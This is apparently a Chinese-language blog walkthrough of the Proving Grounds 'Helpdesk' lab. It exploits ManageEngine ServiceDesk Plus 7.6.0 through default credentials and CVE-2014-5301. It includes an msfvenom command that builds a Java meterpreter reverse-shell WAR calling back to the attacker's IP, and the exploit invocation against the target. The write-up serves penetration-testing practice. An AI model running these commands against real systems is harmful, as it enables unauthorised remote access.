Proving Grounds Practice : Helpdesk Walkthrough

 Proving Grounds Practice : Helpdesk Walkthrough

Foothole (立足點 ) :

PE ( 提權 ) :

  • 不用 PE,進去就是管理者了

注意事項 : 

  • 需要有帳號密碼的驗證後上載一個 JAVA Payload reverse shell
  • 這一題直接使用系統的預設的帳號密碼
  • 枚舉時發現太多項,結果到底要用哪一個 Exploit 很讓人傷腦筋 


Kali IP : 192.168.45.204

靶機 IP : 192.168.205.43


第一步掃 Port



nmap

8080 Apache Tomcat/Coyote JSP engine 1.1



8080 /

ManageEngine ServiceDesk Plus 7.6.0


版本資訊 ManageEngine ServiceDesk Plus 7.6.0




Google 搜尋套件預設帳號密碼 administrator:administrator



輸入帳密後可以登入



搜尋看看有沒有驗證過後的 RCE,結果也太多了吧.....

有 Metasploit 就是好事



Exploit-DB 35845 顯示是 Authenticated 看來是有點符合,CVE 是 2014-5301



Google CVE 看看有沒有可以手動用的 python code



直接使用第一個試試看

參考 : https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py



描述有寫要先用 msfvenom 建一個 Java payload,也有給範例

# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.108 LPORT=4444 -f war > shell.war

那就先建立一個 payload

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.45.204 LPORT=4444 -f war > shell.war





PoC 也有給使用的範例,# Script usage: ./CVE-2014-5301.py HOST PORT USERNAME PASSWORD WARFILE

直接利用看看 ./exploit.py 192.168.205.43 8080 administrator administrator shell.war


直接拿到 shell 了,whoami 看一下確定是管理者,結束這回合




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)